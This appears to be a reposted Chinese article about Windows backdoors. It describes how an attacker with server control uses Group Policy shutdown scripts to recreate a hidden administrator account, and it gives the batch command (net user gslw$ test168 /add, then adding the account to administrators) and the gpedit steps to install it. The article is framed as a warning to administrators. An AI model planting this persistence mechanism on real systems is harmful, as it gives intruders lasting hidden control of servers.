WINDOWS系统后门实例三

组策略欺骗，最隐蔽的后门

创新互联专注为客户提供全方位的互联网综合服务，包含不限于成都网站制作、网站设计、顺城网络推广、小程序设计、顺城网络营销、顺城企业策划、顺城品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等，从售前售中售后，我们都将竭诚为您服务，您的肯定，是我们最大的嘉奖；创新互联为所有大学生创业者提供顺城建站搭建服务，24小时服务热线：18982081108，官方网址：www.cdcxhl.com

组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩，也为大家所熟知。其实，在最策略中也可以实现该功能，不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本（启动/关机）”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性，因此常常被攻击者利用来做服务器后门。

攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本，最简单的比如创建一个管理员用户，他可以这样做：

（1）创建脚本

创建一个批处理文件add.bat，add.bat的内容是：

 
 
 
 
  
  
  
  
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit 
 
 
 

（创建一个用户名为gslw$密码为test168的管理员用户）。

（2）后门利用

在“运行”对话框中输入gpedit.msc，定位到“计算机配置一>Windows设置一>脚本（启动/关机）”， 双击右边窗口的“关机”，在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户，就是他看见并且删除了该帐户，当系统关机时又会创建该帐户。所以说，如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。

其实，对于组策略中的这个“后门”还有很多利用法，攻击者通过它来运行脚本或者程序，嗅探管理员密码等等。当他们获取了管理员的密码后，就不用在系统中创建帐户了，直接利用管理员帐户远程登录系统。因此它也是“双刃剑”，希望大家重视这个地方。当你为服务器被攻击而莫名其妙时，说不定攻击者就是通过它实现的。（图6）

【编辑推荐】

1. 后门木马隐藏技术分析
2. WINDOWS系统后门实例一
3. 如何全面清除计算机电脑病毒
4. WINDOWS系统后门实例二 图
5. Windows组策略保障共享目录安全
6. 安全设置Windows组策略有效阻止黑客

分享标题：WINDOWS系统后门实例三
网站网址：http://www.shufengxianlan.com/qtweb/news28/277578.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联